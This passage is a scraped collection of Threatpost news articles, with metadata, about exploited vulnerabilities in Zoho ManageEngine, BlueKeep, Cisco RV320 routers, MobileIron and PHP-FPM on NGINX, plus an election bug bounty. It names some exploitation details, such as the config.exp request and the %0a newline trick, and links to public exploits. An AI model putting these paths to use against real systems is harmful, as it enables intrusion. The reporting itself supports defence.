endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. The flaw ([CVE-2020-10189)](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) was first disclosed on March 5 as a zero-day, and [was later patched](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) on March 7. The attackers exploited the flaw to deploy payloads (install.bat and storesyncsvc.dll) in two ways. First, after exploiting the flaw they directly uploaded a simple Java-based program (\u201clogger.zip\u201d) containing a set of commands, which then used PowerShell to download and execute the payloads. In a second attack, APT41 leveraged a legitimate Microsoft command-line tool, BITSAdmin, to download the payload.\n\nNotably, after exploitation, the attackers have been seen only leveraging publicly available malware, including Cobalt Strike (a [commercially available exploitation framework](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>)) and Meterpreter (a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code). Said researchers: \u201cWhile these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.\u201d\n\n**APT41 Activity **\n\nInterestingly, between waves of exploitation, researchers observed a lull in APT41 activity. The first lull, between Jan. 23 and Feb. 1, was likely related to the Chinese Lunar New Year holidays (which occurred Jan. 24 \u2013 30): \u201cThis has been a common activity pattern by Chinese APT groups in past years as well,\u201d said researchers.\n\nThe second lull, occurring Feb. 2 \u2013 19, may have been related to fallout from the rapid spread of the coronavirus pandemic. Researchers noted that China had initiated [COVID-19 related quarantines](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) in cities in the Hubei province Jan. 23 \u2013 24, and rolled out quarantines to additional provinces starting between Feb. 2 and Feb. 10.\n\n\u201cWhile it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry,\u201d said researchers.\n\nThey also said that [APT41 ](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>) has [historically](<https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html>) (since 2012) conducted dual Chinese state-sponsored espionage activity and personal, financially motivated activity. More recently, in October 2019, the [threat group was discovered](<https://threatpost.com/china-hackers-spy-texts-messagetap-malware/149761/>) using a new malware strain to intercept telecom SMS server traffic and sniff out certain phone numbers and SMS messages \u2013 particularly those with keywords relating to Chinese political dissidents.\n\n\u201cIn 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks,\u201d said researchers on Wednesday. \u201cThis new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-03-25T15:57:25", "type": "threatpost", "title": "Chinese Hackers Exploit Cisco, Citrix Flaws in Massive Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-03-25T15:57:25", "id": "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "href": "https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-07T21:57:53", "description": "A researcher has created a proof-of-concept Metasploit module for the critical BlueKeep vulnerability, which successfully demonstrates how to achieve complete takeover of a target Windows machine.\n\nReverse engineer Z\u01dd\u0279osum0x0 [tweeted about his success](<https://twitter.com/zerosum0x0/status/1135866953996820480>) on Tuesday, noting that he plans to keep the module private given the danger that a working exploit could pose to the vast swathe of unpatched systems out there. He also released a video showing a remote code-execution (RCE) exploit working on a Windows 2008 desktop, paired with a Mimikatz tool to harvest login credentials. In about 22 seconds, he achieved full takeover.\n\n\u201cStill too dangerous to release, lame sorry,\u201d he tweeted. \u201cMaybe after first mega-worm?\u201d\n\nAn [earlier proof-of-concept (PoC) from McAfee](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) showed a successful RCE exploit, but didn\u2019t include the credential-harvesting \u2013 so a mitigating factor in that exploit would be the need for an attacker to bypass network-level authentication protections. \n[](<https://threatpost.com/newsletter-sign/>)The BlueKeep vulnerability (CVE-2019-0708) RCE flaw exists in Remote Desktop Services and impacts older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a [WannaCry-level, fast-moving infection wave](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\nThe concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch.\n\nThe new exploit works on most vulnerable machines, with the exception of Windows Server 2003, according to Z\u01dd\u0279osum0x0. The researcher [said that it took time](<https://twitter.com/zerosum0x0/status/1135219212199186434>) to develop the exploit, but clearly it can be achieved.\n\nThe National Security Agency concurs with the engineer on the possibility of widespread, in-the-wild exploitation.\n\n\u201cIt is likely only a matter of time before remote exploitation code is widely available for this vulnerability,\u201d the NSA said in [an advisory](<https://www.us-cert.gov/ncas/current-activity/2019/06/04/NSA-Releases-Advisory-BlueKeep-Vulnerability>) on Tuesday. \u201cNSA is concerned that malicious cyber-actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.\u201d\n\nThe danger isn\u2019t just the potential for a worm-wave; denial-of-service could be a problem too. Researchers attempting to create PoC exploits found that their efforts [largely caused systems to crash](<https://www.exploit-db.com/exploits/46946>) before they could achieve RCE.\n\nTo boot, the attack surface is unfortunately large. Although Microsoft issued a patch for the recently disclosed BlueKeep as part of its [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin (and there\u2019s a [micropatch](<https://0patch.com/patches.html>) out there too), [researchers said last week](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) that at least 1 million devices linked to the public internet are still vulnerable to the bug. And, the NSA in its advisory warned that the number could actually be in the multimillions.\n\nSome are finding patching to be an onerous process given that many older machines are in production environments where the required reboot \u2013 taking mission-critical systems offline \u2014 just isn\u2019t feasible.\n\n> But patch deployment will take 35 days and we cant deploy to 18.24% because downtime issues and we've raised the requests for the rest into the change tool and \u2026\u2026..\n> \n> \u2014 Taz Wake (@tazwake) [June 4, 2019](<https://twitter.com/tazwake/status/1135890835101368321?ref_src=twsrc%5Etfw>)\n\nNonetheless, with the demonstration that RCE can be achieved, hopefully administrators will find a way to update their environments.\n\n\u201cIt only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise,\u201d Microsoft warned in [an advisory](<https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/>). \u201cThis scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-05T14:14:47", "type": "threatpost", "title": "BlueKeep 'Mega-Worm' Looms as Fresh PoC Shows Full System Takeover", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2019-0708"], "modified": "2019-06-05T14:14:47", "id": "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "href": "https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-04T12:27:29", "description": "UPDATE\n\nMalicious scanning activity targeting Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN routers is underway, with a swell of opportunistic probes looking for vulnerable devices ramping up since Friday.\n\nAccording to Bad Packets Report\u2019s honeypot data, cyberattackers are targeting a pair of just-patched vulnerabilities that allow remote unauthenticated information disclosure ([CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)) leading to remote code-execution (CVE-2019-1652) on the routers. There are more than 9,000 routers open to the attack, the firm found.\n\nThe first vulnerability exists in the web-based management interface for RV320/RV325; a simple GET request for /cgi-bin/config.exp returns full details of the device\u2019s configuration settings, including administrator credentials (the password is hashed though).\n\n\u201c[This] could allow an unauthenticated, remote attacker to retrieve sensitive configuration information,\u201d explained researcher Troy Mursch, in [an advisory](<https://badpackets.net/over-9000-cisco-rv320-rv325-routers-vulnerable-to-cve-2019-1653/>) published over the weekend. \u201cAll configuration details of the RV320/RV325 router are exposed by this vulnerability.\u201d\n\nBad Packets Report\u2019s own scanning efforts [using BinaryEdge](<https://www.binaryedge.io/>), which canvassed 15,309 unique IPv4 hosts, determined that 9,657 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653: Broken down, it works out to 6,247 vulnerable out of 9,852 Cisco RV320 routers scanned; and 3,410 vulnerable out of 5,457 Cisco RV325 routers scanned.\n\nThese are mostly located in the United States, Mursch said, though overall, vulnerable devices were found in 122 countries and on the networks of 1,619 different ISPs \u2013 making for a significant, global attack surface.\n\nOnce a malefactor has gained admin credentials, he or she can further exploit the router after signing in. The CVE-2019-1652 flaw allows an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input.\n\n\u201cAn attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device,\u201d according to Cisco\u2019s [documentation](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652>). \u201cA successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root.\u201d\n\nA [proof-of-concept](<https://github.com/0x27/CiscoRV320Dump>) for remote code-execution has been detailed by researcher/grey hat David Davidson, but Mursch noted that there are mitigating circumstances.\n\n\u201cIn regards to how the routers are going to be exploited once compromised, it\u2019s not fully known yet,\u201d he told Threatpost. \u201cAt this point, I can only confirm threat actors are only taking inventory of vulnerable devices by scraping the leaked configuration files and credentials. The actual damage may be limited due to the capabilities (or lack thereof) noted by David Davidson. Only time will tell.\u201d\n\nDavidson\u2019s tweet explained:\n\n> yeah basically anyone unpatched is probably fucked. except for the fact the 'wget' on these boxes is broken half the time and its probably beyond your average skid to cross compile their mirai bot for the correct mips64rev2 shit (for now)\n> \n> \u2014 some person (@info_dox) [January 26, 2019](<https://twitter.com/info_dox/status/1089002947076333570?ref_src=twsrc%5Etfw>)\n\nOne interesting point to note is that the vulnerability also results in the SSID being leaked.\n\n\u201cThis allows attackers to use services such as WiGLE to determine the physical location of the router,\u201d Mursch told Threatpost.\n\nThis was also the case in the recent [Orange Livebox vulnerability](<https://threatpost.com/19k-orange-livebox-modems-open-to-attack/140376/>), Mursch pointed out. That means that an attacker can mount a variety of on-location proximity hacks, and it also allows easier botnet-building given that many admins use the same credentials for the administrative panel as well as the WiFi network \u2014 opening the door to more devices to enslave.\n\nThe vulnerabilities affect Cisco RV320/RV325 routers running firmware releases 1.4.2.15 and 1.4.2.17. Cisco\u2019s patch should be applied immediately, and administrators should change their devices\u2019 admin and WiFi credentials to thwart any compromise that may have already occurred.\n\n_This post was updated at 6:13 p.m. ET on Jan. 28, with comments from Mursch._\n", "cvss3": {}, "published": "2019-01-28T16:04:07", "type": "threatpost", "title": "Active Scans Target Vulnerable Cisco Routers for Remote Code-Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-01-28T16:04:07", "id": "THREATPOST:F097BB854B5DC8D38AF4AE693CF4EE96", "href": "https://threatpost.com/scans-cisco-routers-code-execution/141218/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-11-26T03:52:19", "description": "Advanced persistent threat (APT) groups are actively exploiting a vulnerability in mobile device management security solutions from MobileIron, a new advisory warns.\n\nThe issue in question (CVE-2020-15505) is a remote code-execution flaw. It ranks 9.8 out of 10 on the CVSS severity scale, making it critical. The flaw was patched back in June, however, a proof of concept (PoC) [exploit became available](<https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505>) in September. Since then, both hostile state actors and cybercriminals have attempted to exploit the flaw in the U.K., according to a new advisory by the National Cyber Security Centre (NCSC).\n\n\u201cThese actors typically scan victim networks to identify vulnerabilities, including CVE-2020-15505, to be used during targeting,\u201d said the NCSC [in an advisory this week](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>). \u201cIn some cases, when the latest updates are not installed, they have successfully compromised systems.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe NCSC said that the healthcare, local government, logistics and legal sectors have all been targeted \u2013 but others could also be affected.\n\nSeparately, the Cybersecurity and Infrastructure Security Agency (CISA) [in October warned that](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>) APT groups are exploiting the MobileIron flaw in combination with the severe Microsoft Windows [Netlogon/Zerologon vulnerability](<https://threatpost.com/microsoft-warns-zerologon-bug/160769/>) (CVE-2020-1472).\n\n## **The Flaw**\n\nThe flaw, first reported to MobileIron by Orange Tsai from DEVCORE, could allow an attacker to execute remote exploits without authentication.\n\nMobileIron provides a platform that allows enterprises to manage the end-user mobile devices across their company. The flaw exists across various components of this platform: In MobileIron Core, a component of the MobileIron platform that serves as the administrative console; and in MobileIron Connector, a component that adds real-time connectivity to the backend. Also impacted is Sentry, an in-line gateway that manages, encrypts and secures traffic between the mobile-device and back-end enterprise systems; and Monitor and Reporting Database, which provides comprehensive performance management functionality.\n\nThe bug affects Core and Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors.\n\n## **Patches**\n\nMobileIron, for its part, said in an update this week that it has been engaging in \u201cproactive outreach to help customers secure their systems,\u201d and estimates that 90 to 95 percent of all devices are now managed on patched/updated versions of software.\n\nWhile the company said it will continue to follow up with the remaining customers where we can determine that they have not yet patched affected products, it strongly urges companies to make sure they are updated.\n\n\u201cMobileIron strongly recommends that customers apply these patches and any security updates as soon as possible,\u201d said the company in its [security update.](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)\n\nThreatpost has reached out to MobileIron for further comment.\n\n**_Put Ransomware on the Run: Save your spot for \u201cWhat\u2019s Next for Ransomware,\u201d a _****_[FREE Threatpost webinar](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)_****_ on _****_Dec. 16 at 2 p.m. ET. _****_Find out what\u2019s coming in the ransomware world and how to fight back. _**\n\n**_Get the latest from world-class security experts on new kinds of attacks, the most dangerous ransomware threat actors, their evolving TTPs and what your organization needs to do to get ahead of the next, inevitable ransomware attack. _****_[Register here](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)_****_ for the Wed., Dec. 16 for this _****_LIVE webinar_****_._**\n", "cvss3": {}, "published": "2020-11-25T16:55:48", "type": "threatpost", "title": "Critical MobileIron RCE Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-15505"], "modified": "2020-11-25T16:55:48", "id": "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "href": "https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-30T22:24:12", "description": "As the 2020 presidential election draws closer and primary season looms around the corner, Microsoft has launched a bug-bounty program specifically aimed at its ElectionGuard product, which the software giant has positioned as performing \u201cend-to-end verification of elections.\u201d\n\nElectionGuard is a free open-source software development kit that secures the results of elections and makes those results securely available to approved third-party organizations for validation; it also allows individual voters to confirm that their votes were correctly counted.\n\nThe bounty program invites security researchers (\u201cwhether full-time cybersecurity professionals, part-time hobbyists or students\u201d) to probe ElectionGuard for high-impact vulnerabilities and share them with Microsoft under Coordinated Vulnerability Disclosure (CVD). Eligible submissions with a \u201cclear, concise proof of concept\u201d (PoC) are eligible for awards ranging from $500 to $15,000 depending on the severity of the bug found.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn-scope products include the ElectionGuard specification and documentation (such as data-transmission issues like information leakage); the verifier reference implementation (bugs that allow attackers to say elections are valid when they aren\u2019t); and C Cryptography implementations (such as bugs that allow key or vote discovery by observing SDK messages).\n\nThe program is one prong of the company\u2019s wider \u201cDefending Democracy\u201d program, under which Microsoft has pledged to [protect campaigns from hacking](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>); increase political [advertising transparency](<https://threatpost.com/google-fine-privacy-gdpr/141055/>) online; explore ways to [protect electoral processes](<https://threatpost.com/voting-machines-hacked-with-ease-at-def-con/127101/>) with technology; and defend against [disinformation campaigns](<https://threatpost.com/twitter-5000-accounts-disinformation-campaigns/145764/>).\n\nResearchers said that the bug-bounty program is a welcome \u2013 if limited \u2013 addition to the private sector\u2019s response to election meddling. However, they also highlighted the need for a more holistic effort, united across both public and private organizations.\n\n\u201c[Russian interference in the 2016 election](<https://threatpost.com/justice-department-indicts-12-russian-nationals-tied-to-2016-election-hacking/133978/>) gave cybersecurity a quick moment in the political spotlight,\u201d Monique Becenti, product and channel specialist at SiteLock, told Threatpost. \u201cBut when the cost of cybercrime reaches billions of dollars each year, election security needs to be top of mind for our political leaders. Since 2016, election security bills have been slow-moving. Some companies, like Microsoft, are rallying the security industry to address this issue head-on. The ElectionGuard Bounty program is an important step in the right direction, but we need political leaders who will champion this issue and ensure constituents and our elections stay secure.\u201d\n\nNot everyone is excited about the move; Richard Gold, head of security engineering at Digital Shadows, said that the program is limited to Microsoft\u2019s proprietary solution, which makes its real-world impact limited at best.\n\n\u201cIt\u2019s great that companies like Microsoft are launching programs like this, but the question remains: how much is this kind of bug bounty going to be used?\u201d he told Threatpost. \u201cBug-bounty programs need to be applied consistently in order to have real impact. There is a trade off in time and resources that needs to be overcome in order for a program like this to be worthwhile.\u201d\n\n\u201cMicrosoft is committed to strengthening our partnership with the security research community as well as pursuing new areas for security improvement in emerging technology,\u201d said Jarek Stanley, senior program manager at the Microsoft Security Response Center, in [announcing the program](<https://msrc-blog.microsoft.com/2019/10/18/introducing-the-electionguard-bounty-program/>). \u201cWe look forward to sharing more bounty updates and improvements in the coming months.\u201d\n\nMicrosoft paid $4.4 million in bounty rewards between July 1, 2018 and June 30 across 11 bounty programs, with a top award of $200,000.\n\n**_What are the top cybersecurity issues associated with privileged account access and credential governance? Experts from Thycotic on Oct. 23 will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree &amp; Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-10-18T20:04:29", "type": "threatpost", "title": "Microsoft Tackles Election Security with Bug Bounties", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-1472"], "modified": "2019-10-18T20:04:29", "id": "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "href": "https://threatpost.com/microsoft-election-security-bug-bounties/149347/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:27:50", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-06T21:57:01", "description": "A buffer underflow bug in PHP could allow remote code-execution (RCE) on targeted NGINX servers.\n\nFirst discovered during a hCorem Capture the Flag competition in September, the bug (CVE-2019-11043) exists in the FastCGI directive used in some PHP implementations on NGINX servers, according to researchers at Wallarm.\n\nPHP powers about 30 percent of modern websites, including popular web platforms like WordPress and Drupal \u2013 but NGINX servers are only vulnerable if they have PHP-FPM enabled (a non-default optimization feature that allows servers to execute scripts faster). The issue [is patched](<https://bugs.php.net/patch-display.php?bug_id=78599&patch=0001-Fix-bug-78599-env_path_info-underflow-can-lead-to-RC.patch&revision=latest>) in PHP versions 7.3.11, 7.2.24 and 7.1.33, which were released last week.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn a [Monday posting](<https://github.com/search?q=fastcgi_split_path&type=Code>), Wallarm researchers said that the bug can be exploited by sending specially crafted packets to the server by using the \u201cfastcgi_split_path\u201d directive in the NGINX configuration file. That file is configured to process user data, such as a URL. If an attacker creates a special URL that includes a \u201c%0a\u201d (newline) byte, the server will send back more data than it should, which confuses the FastCGI mechanism.\n\n\u201cIn particular, [the bug can be exploited] in a fastcgi_split_path directive and a regexp trick with newlines,\u201d according to Wallarm security researcher Andrew Danau, who found the bug. \u201cBecause of %0a character, NGINX will set an empty value to this variable, and fastcgi+PHP will not expect this\u2026.[as a result], it\u2019s possible to put [in] arbitrary FastCGI variables, like PHP_VALUE.\u201d\n\nAnother security researcher participating in the CTF exercise, Emil Lerner, offered more details in the [PHP bug tracker](<https://bugs.php.net/bug.php?id=78599>): \u201cThe regexp in `fastcgi_split_path_info` directive can be broken using the newline character (in encoded form, %0a). Broken regexp leads to empty PATH_INFO, which triggers the bug,\u201d he said.\n\nLerner [posted a zero-day proof-of-concept](<https://github.com/neex/phuip-fpizdam/>) exploit for the flaw that works in PHP 7 to allow code execution. The exploit makes use of an optimization used for storing FastCGI variables, _fcgi_data_seg.\n\n\u201cUsually, that sort of [buffer underflow] response is related to memory-corruption attacks and we expected to see an attack on the type of information disclosure,\u201d Wallarm researchers said. \u201cInformation disclosure is bad enough as it can result in leaking sensitive or financial data. Even worse, from time to time, although quite rarely, such behavior can indicate a remote code-execution vulnerability.\u201d\n\nResearchers added that without patching, this issue can be a dangerous entry point into web applications given the trivial nature of 